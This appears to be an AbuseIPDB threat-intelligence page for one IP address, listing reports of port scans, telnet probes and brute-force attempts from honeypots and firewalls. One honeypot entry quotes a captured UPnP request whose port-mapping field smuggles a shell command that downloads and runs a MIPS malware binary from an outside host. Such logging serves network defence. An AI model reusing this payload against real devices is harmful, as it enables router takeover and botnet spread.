JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 152.53.53.177

152.53.53.177 was found in our database!

This IP was reported 36 times. Confidence of Abuse is 100%: ?

100%

ISP	netcup GmbH
Usage Type	Data Center/Web Hosting/Transit
ASN	AS214996
Hostname(s)	v2202412206828305101.supersrv.de
Domain Name	netcup.de
Country	🇺🇸 United States of America
City	Manassas, Virginia

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 152.53.53.177

Whois 152.53.53.177

IP Abuse Reports for 152.53.53.177:

This IP address has been reported a total of 36 times from 27 distinct sources. 152.53.53.177 was first reported on June 16th 2026, and the most recent report was 1 hour ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇦🇹 urnilxfgbez	2026-06-17 22:45:00 (1 hour ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇬🇧 gbzret4d	2026-06-17 10:27:54 (13 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇩🇪 _ArminS_	2026-06-17 10:04:21 (14 hours ago)	SP-Scan 12892:23 detected 2026.06.17 12:04:21 blocked until 2026.08.06 05:07:08	Port Scan
🇺🇸 RAP	2026-06-17 09:54:42 (14 hours ago)	2026-06-17 09:54:42 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇹🇭 Sawasdee	2026-06-17 09:21:06 (14 hours ago)	Port Scan ...	Port Scan
Anonymous	2026-06-17 08:49:08 (15 hours ago)	PROTO=TCP DPT=23	Port Scan Hacking
🇺🇸 xmission.com	2026-06-17 08:27:27 (15 hours ago)	Blocked by UFW (TCP on 23) Source port: 48969 TTL: 49 Packet length: 40 TOS: 0x08 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 48969 TTL: 49 Packet length: 40 TOS: 0x08 This report (for 152.53.53.177) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇩🇪 dispaisyenterprises	2026-06-17 07:51:31 (16 hours ago)	Honeypot [fra-de-honeypot]: Unauthorized connection attempt detected on 23/TELNET Reported by DisPai ... show more Honeypot [fra-de-honeypot]: Unauthorized connection attempt detected on 23/TELNET Reported by DisPaisy Enterprises (dispaisy.systems) using: https://github.com/sefinek/T-Pot-To-AbuseIPDB show less	Hacking Port Scan
🇺🇸 RAP	2026-06-17 07:19:12 (16 hours ago)	2026-06-17 07:19:12 UTC Unauthorized activity to TCP port 2323. Telnet	Port Scan
🇨🇭 cybsecaoccol	2026-06-17 07:18:23 (16 hours ago)	multiple malicious connection attempts on tcp port 23 - sch	DDoS Attack Port Scan Hacking Brute-Force
🇫🇷 EDSL	2026-06-17 07:02:27 (17 hours ago)	[SRV-VPN1] Blocked by SysWarden Firewall (Port Scan / Probing)	Port Scan
🇺🇸 xmission.com	2026-06-17 06:29:05 (17 hours ago)	Blocked by UFW (TCP on 5555) Source port: 51653 TTL: 58 Packet length: 40 TOS: 0x00 This report (fo ... show more Blocked by UFW (TCP on 5555) Source port: 51653 TTL: 58 Packet length: 40 TOS: 0x00 This report (for 152.53.53.177) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇺🇸 xmission.com	2026-06-17 05:20:35 (18 hours ago)	Blocked by UFW (TCP on 23) Source port: 30179 TTL: 58 Packet length: 40 TOS: 0x00 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 30179 TTL: 58 Packet length: 40 TOS: 0x00 This report (for 152.53.53.177) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
Anonymous	2026-06-17 05:15:53 (19 hours ago)	<jail> banned by fail2ban	Brute-Force Web App Attack
🇺🇸 RAP	2026-06-17 04:32:41 (19 hours ago)	2026-06-17 04:32:41 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan

Showing 1 to 15 of 36 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 212.227.31.187

🇨🇳 101.96.192.88

🇺🇸 66.132.172.150

🇺🇸 57.141.20.42

🇭🇰 199.45.155.90

🇨🇬 197.214.239.167

🇵🇱 195.78.67.51

🇲🇽 187.216.224.85

🇩🇪 185.242.3.226

🇪🇸 185.176.8.77

🇧🇼 168.167.72.132

🇺🇸 147.185.132.12

🇺🇸 104.152.52.100

🇩🇪 69.5.169.243

🇩🇪 69.5.169.84

🇩🇪 69.5.169.50

🇨🇳 58.209.108.136

🇧🇪 35.205.16.223

🇬🇧 2a06:4880:8000::93

🇱🇺 217.70.186.133